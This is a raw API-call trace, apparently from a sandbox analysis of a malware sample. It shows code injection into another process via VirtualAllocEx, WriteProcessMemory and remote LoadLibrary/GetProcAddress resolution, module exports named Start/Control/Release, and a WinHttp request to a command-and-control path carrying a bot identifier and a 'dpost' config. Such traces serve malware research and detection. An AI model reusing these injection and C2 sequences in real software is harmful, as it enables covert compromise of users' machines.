	[0215.581] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.581] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.581] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.582] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.582] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004104, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.582] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.582] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0215.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749a12, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0215.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0215.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749a12, cbMultiByte=-1, lpWideCharStr=0x2733188, cchWideChar=13 | out: lpWideCharStr="OLEAUT32.dll") returned 13
	[0215.582] lstrlenW (lpString="OLEAUT32.dll") returned 12
	[0215.582] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.583] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2733188*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2733188*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0215.583] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0215.583] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.583] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.583] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0215.584] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0215.584] ResetEvent (hEvent=0x548) returned 1
	[0215.584] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.584] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0215.584] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.584] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.584] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.585] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0215.585] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.585] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.585] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.585] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.585] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.585] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.586] ResetEvent (hEvent=0x548) returned 1
	[0215.586] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.586] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.586] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.586] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.586] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040a0, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.587] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.587] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.587] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.587] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.587] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.587] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.588] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.588] ResetEvent (hEvent=0x548) returned 1
	[0215.588] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.588] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.588] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.588] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.588] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040a4, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.589] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.589] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.589] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.589] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.589] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.589] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.590] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.590] ResetEvent (hEvent=0x548) returned 1
	[0215.590] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.590] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.590] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.590] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040a8, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.591] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.591] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.591] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.591] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.591] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.591] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.592] ResetEvent (hEvent=0x548) returned 1
	[0215.592] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.592] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.592] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.593] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.593] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.593] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.593] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.593] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.593] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.594] ResetEvent (hEvent=0x548) returned 1
	[0215.594] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.594] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.594] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.594] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.594] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.594] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.595] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.595] ResetEvent (hEvent=0x548) returned 1
	[0215.595] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.595] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.595] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.596] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.596] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.596] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.596] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.597] ResetEvent (hEvent=0x548) returned 1
	[0215.597] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.597] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.597] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.597] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.598] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.598] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.598] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.598] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.598] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.598] ResetEvent (hEvent=0x548) returned 1
	[0215.598] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.598] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.598] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.599] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.599] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0215.599] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0215.599] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0215.599] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0215.599] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0215.599] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0215.599] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0215.599] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0215.599] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0215.599] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0215.599] VirtualProtectEx (in: hProcess=0x584, lpAddress=0x10001000, dwSize=0x2385, flNewProtect=0x20, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0215.600] VirtualProtectEx (in: hProcess=0x584, lpAddress=0x10004000, dwSize=0x1b70, flNewProtect=0x2, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0215.600] VirtualProtectEx (in: hProcess=0x584, lpAddress=0x10006000, dwSize=0x40c, flNewProtect=0x4, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0215.600] VirtualProtectEx (in: hProcess=0x584, lpAddress=0x10007000, dwSize=0x2dc, flNewProtect=0x2, lpflOldProtect=0x1287dc | out: lpflOldProtect=0x1287dc*=0x4) returned 1
	[0215.600] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128748, nSize=0x70, lpNumberOfBytesRead=0x128728 | out: lpBuffer=0x128748*, lpNumberOfBytesRead=0x128728*=0x70) returned 1
	[0215.600] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0215.600] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.601] ResetEvent (hEvent=0x548) returned 1
	[0215.601] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.601] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128748, nSize=0x70, lpNumberOfBytesRead=0x128720 | out: lpBuffer=0x128748*, lpNumberOfBytesRead=0x128720*=0x70) returned 1
	[0215.601] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.601] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0215.601] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2740c28) returned 1
	[0215.601] lstrlenA (lpString="networkDll32") returned 12
	[0215.601] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.602] ResetEvent (hEvent=0x548) returned 1
	[0215.602] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.610] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128be8, nSize=0x70, lpNumberOfBytesRead=0x128bc0 | out: lpBuffer=0x128be8*, lpNumberOfBytesRead=0x128bc0*=0x70) returned 1
	[0215.610] VirtualFreeEx (hProcess=0x584, lpAddress=0x250000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.610] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6378) returned 1
	[0215.610] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x128fec, nSize=0x400, lpNumberOfBytesRead=0x128c78 | out: lpBuffer=0x128fec*, lpNumberOfBytesRead=0x128c78*=0x400) returned 1
	[0215.611] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.611] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0215.611] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0215.611] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12854c | out: lpSystemTimeAsFileTime=0x12854c*(dwLowDateTime=0x69048260, dwHighDateTime=0x1d50a6a)) 
	[0215.611] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12854c | out: lpSystemTimeAsFileTime=0x12854c*(dwLowDateTime=0x69048260, dwHighDateTime=0x1d50a6a)) 
	[0215.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0215.611] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0215.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6e40
	[0215.611] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0215.611] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0215.611] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/dpost/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0215.611] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x127c3c, dwBufferLength=0x4) returned 1
	[0215.611] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0216.954] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0216.954] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x127c2c, lpdwBufferLength=0x127c28, lpdwIndex=0x0 | out: lpBuffer=0x127c2c*, lpdwBufferLength=0x127c28*=0x4, lpdwIndex=0x0) returned 1
	[0216.954] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127c30 | out: lpdwNumberOfBytesAvailable=0x127c30*=0x3a0) returned 1
	[0216.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x3a0) returned 0x22ba9c8
	[0216.954] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22ba9c8, dwNumberOfBytesToRead=0x3a0, lpdwNumberOfBytesRead=0x127c28 | out: lpBuffer=0x22ba9c8*, lpdwNumberOfBytesRead=0x127c28*=0x3a0) returned 1
	[0216.954] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127c30 | out: lpdwNumberOfBytesAvailable=0x127c30*=0x0) returned 1
	[0216.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0216.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2762c50
	[0216.954] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.955] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.955] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0216.955] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.955] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0216.955] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2733188, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2733188, pdwDataLen=0x1284a8) returned 1
	[0216.955] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.955] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.955] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.955] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.955] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0216.955] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.955] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733110
	[0216.955] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2733110, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2733110, pdwDataLen=0x1284a8) returned 1
	[0216.955] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0216.955] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.955] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0216.956] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0216.956] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0216.956] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0216.956] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27357a8
	[0216.956] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27357a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27357a8, pdwDataLen=0x1284a8) returned 1
	[0216.956] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0216.956] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0216.956] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
